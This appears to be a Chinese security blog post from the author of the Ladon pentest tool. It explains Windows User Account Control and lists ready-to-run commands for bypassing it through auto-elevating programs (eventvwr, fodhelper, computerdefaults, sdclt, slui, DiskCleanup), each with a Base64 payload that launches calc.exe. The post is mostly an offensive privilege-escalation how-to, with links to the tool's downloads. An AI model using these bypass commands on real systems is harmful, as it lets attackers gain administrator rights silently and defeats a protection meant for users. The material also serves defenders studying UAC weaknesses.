〖提权〗Ladon 8.0五种白名单方法BypaaUAC
本文于 1548 天之前发表
什么是UAC
根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限权限的账户.
通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。
BypassUAC方法
目前公开的绕过UAC的几种方式:
1.各类的UAC白名单程序的DLL劫持
2.各类自动提升权限的COM接口利用(Elevated COM interface)
3.Windows 自身漏洞提权
4.远程注入
UACME: https://github.com/hfiref0x/UACME,内含60+种BypassUAC的方法,有兴趣可自行研究
利用白名单
如果进程本身具有管理员权限或者可以直接获取管理员权限的话,就不会弹出UAC框让用户确认,这类程序被称为白名单程序,例如:slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe,rundll32.exe,explorer.exe等等。
Ladon 8.0
[+] BypassUac 五种方法UAC提权(非交互式执行Base64加密CMD命令)
用法Ladon BypassUac
eventvwr
fodhelper
computerdefaults
sdclt
slui
[+] BypassUac2 eventvwr方法执行明文cmd命令(即8.0前的bypassUAC)
Ladon用法
1 | Load BypassUAC |
Base64Cmd: 使用Ladon8.0 GUI版EnCode模块里的Base64Encode加密
Example
Example usage for eventvwr bypass to launch calc.exe
1 | Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl |
Example usage for fodhelper bypass to launch calc.exe
1 | Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl |
Example usage for computerdefaults bypass to launch calc.exe
1 | Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl |
Example usage for sdclt bypass to launch calc.exe
1 | Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl |
Note: this appears to only work on Windows 10 in my testing
Example usage for slui bypass to launch calc.exe
1 | Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl |
Example usage for DiskCleanup bypass to launch calc.exe
1 | Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ== |
Ladon下载
LadonGo3.4: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
Ladon 7.0版本:http://k8gege.org/Download
Ladon 8.0版本:K8小密圈
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈